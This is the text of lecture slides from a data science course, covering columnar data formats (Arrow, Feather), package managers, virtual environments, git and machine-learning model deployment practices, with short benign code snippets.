Kudu is a storage system for tables of structured data Tables have a well-defined schema consisting of a predefined number of typed columns. Each table has a primary key composed of one or more of its columns Kudu tables are composed of a series of logical subsets of data, similar to partitions in relational database systems, called Tablets Kudu provides data durability and protection against hardware failure by replicating these Tablets to multiple commodity hardware nodes

83 Apache Arrow

Engineers from across the community established Arrow as a de-facto standard for columnar in- memory processing and interchange The layout is highly cache-efficient in analytics workloads Not a binary file specification, but a memory representation specification Efficient and fast data interchange between systems without the serialization costs associated with other systems like Thrift, Avro, and Protocol Buffers A flexible structured data model supporting complex types that handles flat tables as well as real-world JSON-like data engineering workloads
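A minimal sketch with pyarrow, moving a pandas DataFrame into Arrow's columnar in-memory representation and back:

import pandas as pd
import pyarrow as pa

df = pd.DataFrame({"user_id": [1, 2, 3], "value": [0.1, 0.2, 0.3]})
table = pa.Table.from_pandas(df)   # an Arrow Table: columnar, Arrow-managed memory
print(table.schema)
df_again = table.to_pandas()       # and back again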

84 Feather

A Fast On-Disk Format for Data Frames for R and Python, powered by Apache Arrow

“ “One thing that struck us was that while R’s data frames and Python’s pandas data frames utilize very different internal memory representations, they share a very similar semantic model”. In discussing Apache Arrow in the context of Python and R, we wanted to see if we could use the insights from feather to design a very fast file format for storing data frames that

could be used by both languages. “

Feather is a fast, lightweight, and easy-to-use binary file format for storing data frames

Lightweight, minimal API: make pushing data frames in and out of memory as simple as possible Language agnostic: Feather files are the same whether written by Python or R code. Other languages can read and write Feather files, too High read and write performance. When possible, Feather operations should be bound by local disk performance

85 Feather

library(feather)
path <- "my_data.feather"
write_feather(df, path)
df <- read_feather(path)

# Analogously, in Python, we have:
import feather
path = 'my_data.feather'
feather.write_dataframe(df, path)
df = feather.read_dataframe(path)

86 What to take away from this?

Be prepared to deal with different data sources

AVRO is fast to serialize (write, dump) data and supports schema evolution: great choice for ETL and integration Parquet and Feather are fast to read, query, and analyse data Feather currently a popular choice for data science

Future: Arrow/Feather + Parquet

Feather is not designed for long-term data storage. At this time, we do not guarantee that the file format will be stable between versions Instead, use Feather for quickly exchanging data between Python and R code, or for short-term storage of data frames as part of some analysis Feather is extremely fast. Since Feather does not currently use any compression internally, it works best when used with solid-state drives as come with most of today’s laptop computers Many organisations are adopting a hybrid approach

87 Packaging and Versioning Systems

88 Packaging

You’ll commonly encounter “package managers” when working in your preferred ecosystem

“ A package manager or package management system is a collection of software tools that automates the process of installing, upgrading, configuring, and removing computer programs

for a computer’s operating system in a consistent manner. “

Management of installs and updates Avoiding conflicts Resolving dependencies

89 Virtual environments

This is commonly combined with a way to set up “virtual environments”: isolated subsystems, each with their own collection of packages

The idea is to make your environment reproducible Avoids the “runs on my computer” syndrome

90 In Python and R

R comes with its own package management system, which allows you to download packages from a repository E.g. install.packages(...)

Virtual environments can be set up using packrat

Python has had a lot of package managers, but the most common one nowadays is pip Included with Python 3 by default Included with the Anaconda distribution E.g. pip install numpy

Virtual environments can be set up using virtualenv

Or you can use conda : Anaconda’s package manager and virtual environment manager in one Includes more than just Python packages; also R and other tools are included Hence it also allows you to set up clean, isolated R workspaces Good rule of thumb: a new conda environment for each project https://conda.io/projects/conda/en/latest/user-guide/getting-started.html https://docs.conda.io/projects/conda/en/4.6.0/_downloads/52a95608c49671267e40c689e0bc00ca/conda-cheatsheet.pdf To isolate a complete environment, virtualization and containerization tools like docker are commonly used as well

91 Versioning systems

Something else to read up on is the use of version control systems

“ Version control systems are a category of software tools that help a software team manage changes to source code over time. Version control software keeps track of every modification to the code in a special kind of database. If a mistake is made, developers can turn back the clock and compare earlier versions of the code to help fix the mistake while minimizing

disruption to all team members. “

Even a good idea to use this for a “team of one” SVN, CVS, Mercurial, Bazaar Most common one is git

92 git

“ Git was created by Linus Torvalds in 2005 for development of the Linux kernel, with other kernel developers contributing to its initial development.

As with most other distributed version-control systems, and unlike most client–server systems, every Git directory on every computer is a full-fledged repository with complete history and full version-tracking abilities, independent of network access or a central server.

Git is free and open-source software distributed under the terms of the GNU General Public

License version 2. “

GitHub: hosts git repositories for you (free) GitLab: an alternative

93 git

GitHub Desktop

94 git

A good way to practice is to put your coding, data science projects, blog even on GitHub

E.g. feel free to try this for an assignment

Many data science recruiters will look at your GitHub profile to see the (personal) projects you’ve worked on and collaborated on

95 Model Deployment

96 Context

Recall from the evaluation session that evaluation doesn’t stop at deployment

Sculley, D., Holt, G., Golovin, D., Davydov, E., Phillips, T., Ebner, D., … & Dennison, D. (2015). Hidden technical debt in machine learning systems. In Advances in neural information processing systems (pp. 2503-2511) In real-world machine learning systems, only a small fraction is comprised of actual ML code There is a vast array of surrounding infrastructure and processes to support their evolution Many sources of technical debt can accumulate in such systems, some of which are related to data dependencies, model complexity, reproducibility, testing, monitoring, and dealing with changes in the external world

97 Context

A simple straight-through process?

98 Common deployment issues

Lineage of data dependencies

Metadata management Ensuring that data is available to the model at prediction-time This includes all pre-processing steps that are applied to the data! Different data sources, one-off data sources used during training Common deployment issues

Deployment context

Will the model be deployed as an API, embedded in a web app, a mobile app, scheduled to run every week, month…? Differences between data science development environment (Jupyter, Anaconda, R…) and I.T. environment (Java, .NET, …) How to keep model changes in sync with application changes?
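As an illustration of the API option, a minimal sketch that exposes a trained model behind a versioned endpoint (Flask, joblib and all names here are illustrative choices, not prescribed by the course material):

from flask import Flask, request, jsonify
import joblib
import pandas as pd

app = Flask(__name__)
model = joblib.load("churn_model_v1.joblib")   # artifact produced by the training pipeline

@app.route("/mymodel/v1/predict", methods=["POST"])
def predict():
    df = pd.DataFrame(request.get_json())      # must match the features/preprocessing used at training time
    proba = model.predict_proba(df)[:, 1]
    return jsonify(predictions=proba.tolist())

if __name__ == "__main__":
    app.run(port=5000)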

100 Common deployment issues

Development governance

Is the training code well-documented? How is collaboration, versioning handled? Can the training code be easily reproduced, e.g. to re-train the model periodically? “Runs on my machine” phenomenon

101 Common deployment issues

Model governance

How is the model deployed? A common platform, using containerization or virtualization, ad-hoc? Is versioning support provided for models? Models as data: can output of one model be easily used in other models/projects? Is lineage kept? Is metadata available (e.g. when was the model last updated?)

102 Common deployment issues

Monitoring

Inputs, outputs, and usage! Do we know when the input data is changing, when the output probability changes? Are errors reported and logged?

103 Common deployment issues

Many of these issues are well known in traditional software engineering

Testing, monitoring, logging, structured development processes Continuous development, integration, deployment (CI/CD)

In the context of ML productionization, many of these are hard to apply

ML models degrade silently! (https://towardsdatascience.com/why-machine-learning-models-degrade-in-production- d0f2108e9214, https://www.elastic.co/blog/beware-steep-decline-understanding-model-degradation-machine-learning- models, https://mlinproduction.com/model-retraining/) Data definitions change, people take actions based on model output, other externalities change (different promotions, products, focus…) Models will happily continue to provide predictions, but as concept drift increases, their accuracy and generalization power will decrease over time A solid model governance infrastructure is key! AIops, MLops

104 Common deployment issues

Many of these issues are well known in traditional software engineering

https://www.tecton.ai/blog/devops-ml-data/

In stark contrast to software engineering, data science doesn’t have a well-defined, fully automated process to get into production quickly.

105 Deployment platforms

Also many in-house solutions: e.g. Uber’s Michelangelo and Manifold, Facebook’s FBLearner flow, Spotify’s Luigi and Airbnb’s Airflow, Netflix’ ML Platform, Airbnb’s Bighead

106 Deployment principles

(Meta)Data management Train-run integration: reproducibility and testing Monitoring, logging and alerting Runtime patterns

107 (Meta)Data management

The issue: during model development, data sources are typically dispersed and entangled, and it is hard to keep track of the data used during a model’s construction. Definitions are unclear or unavailable

A common source of data should be set up and used both during model development and in production
Common data preprocessing steps should be incorporated in the data layer instead of being duplicated over different model pipelines
Don’t split up the data layer in “raw”, “processed” and “final” stages: data is always raw and never final; focus instead on integrating the different sources in a common platform
When using an ad-hoc data source, investigate as early as possible in the development process whether this data source can be ingested in the common layer
Consider for every data input whether the data will be available at prediction-time in a timely manner
Set up a structured data dictionary containing data definitions and metadata information. This includes data purpose constraint definitions (e.g. GDPR and other regulatory constraints): prevent data elements from being used if not allowed
Both data and metadata come with versioning: keep historical records available. I.e. you should be able to retrieve the state of the data as it was during training. This applies to streaming data as well: typically retained in a historical repository to be used when (re)training or using models
Make sure that predictions of models are ingested in the data layer, if they are to be used as an input for other models

108 Train-run integration: reproducibility and testing

The issue: it is hard to re-train an (outdated) model; code used during development lives in a separate environment and is of lower quality than the code that gets deployed in the production environment

Aim for a reproducible pipeline: the resulting artifact of training code should be directly deployable in production
Keep track of each “build” of the model to allow for versioning
This eventually allows for models that can be continuously retrained (e.g. when data comes in as a continuous stream, e.g. when using Kafka, Apache Pulsar, Spark Streams)
After each re-train, report evaluation scores on a standard test set and allow for comparing different model versions. Report errors whilst building and running the model
Decide on a common environment to be used both in development and production (e.g. Python on Anaconda, Spark, H2O, Tensorflow, …), but do allow for flexibility (e.g. using Python libraries) within a well-defined context
Isolate the runtime environment per model
Allow for an updated model to “run silently” along with the current version so you’re free to test the model for a while and analyze its results (“canary” or “shadow” deployment)
Incorporate as much semantic versioning as possible, e.g. API endpoints “/mymodel/v1/”, “/mymodel/v2/”, “/mymodel/latest/stable/”, “/mymodel/latest/testing/” to provide to end-users and integrators
Same for models that run in a scheduled fashion and push their outputs to a data layer: keep versioned data tables

109 Monitoring, logging and alerting

The issue: models fail silently, their accuracy decreases over time, and changing data definitions might lead to models that use those data elements suddenly failing

See: Breck, E., Cai, S., Nielsen, E., Salib, M., & Sculley, D. (2016). What’s your ML Test Score? A rubric for ML production systems
Set up a common monitoring and logging platform
Keep track of inputs provided to the model Do new missing values occur, do the distributions of features change, do new categorical levels appear? How does the system stability index evolve?
Keep track of model outputs as well over time Does the probability distribution of the model change over time? Does usage decrease? Do predictions fail? How long does it take to call the model?
Repeated backtesting or repeated control experiments are even better, but harder
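A rough sketch of such an input/output stability check, assuming the usual population/system stability index formula over decile bins (the thresholds are common rules of thumb):

import numpy as np

def stability_index(expected, actual, bins=10):
    # sum((actual% - expected%) * ln(actual% / expected%)) over bins defined on "expected"
    cuts = np.quantile(expected, np.linspace(0, 1, bins + 1)[1:-1])
    e = np.bincount(np.digitize(expected, cuts), minlength=bins) / len(expected)
    a = np.bincount(np.digitize(actual, cuts), minlength=bins) / len(actual)
    e, a = np.clip(e, 1e-6, None), np.clip(a, 1e-6, None)   # avoid log of / division by zero
    return float(np.sum((a - e) * np.log(a / e)))

scores_train = np.random.normal(0, 1, 10_000)      # distribution at training time
scores_prod = np.random.normal(0.3, 1.2, 10_000)   # distribution observed in production
drift = stability_index(scores_train, scores_prod)
# rule of thumb: < 0.1 stable, 0.1-0.25 some shift, > 0.25 significant shift -> alert / retrain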

110 Monitoring, logging and alerting

https://zenml.io/why-ZenML/

https://www.monalabs.io/

111 Monitoring, logging and alerting

https://evidentlyai.com/ 112 Runtime patterns

The issue: where do models run? How will they be exposed in the organization?

Two common patterns: Push: the model is scheduled to run regularly over a batch of data (or a real-time stream of data), with outputs being saved to the data layer, e.g. to Hadoop, an FTP server, a relational database table, an Excel file Pull: the model is deployed as an API or microservice to be queried by outside consumers … to be used by web apps, mobile apps, BI dashboards, reports… In both cases, an isolated runtime environment needs to be provided!

113 Runtime patterns

Isolated runtime environments

Each deployed version of a model comes with its own environment E.g. Python version, packages used and their version, other supporting executables and libraries Different levels of isolation are possible Environment isolation: e.g. using Python virtual environments, Anaconda environments (e.g. each model runs in its own Anaconda environment) Containerization: e.g. container technologies such as Docker, Kubernetes, Kubeflow (e.g. each model runs in its own Docker container above a shared OS layer) Virtualization: full OS stack is isolated on top of a hardware emulation layer Serverless: models are deployed using e.g. Amazon Lambda, Azure Functions, Google Cloud Functions Typically combined with data layers in the cloud as well Higher isolation levels allow for automatic scaling, easier centralized monitoring and reporting

114 Closing

Trade-off between flexibility and robustness: allowing for experimentation for ad-hoc, new or experimental projects is still fine

Start with the data: make data sources available in a central managed location Once a project matures, move towards the reproducible and governed environment Consider the preferred working environment of data scientists: e.g. many deployment platforms integrate with standard packages such as scikit-learn, Tensorflow and allow developing using Jupyter Notebooks

Not all models end as an API

In many cases, the purpose is to provide a report, dashboard, show insights This is fine Consider link with business intelligence (BI) environment: can model outputs and patterns be easily integrated in existing tooling?

115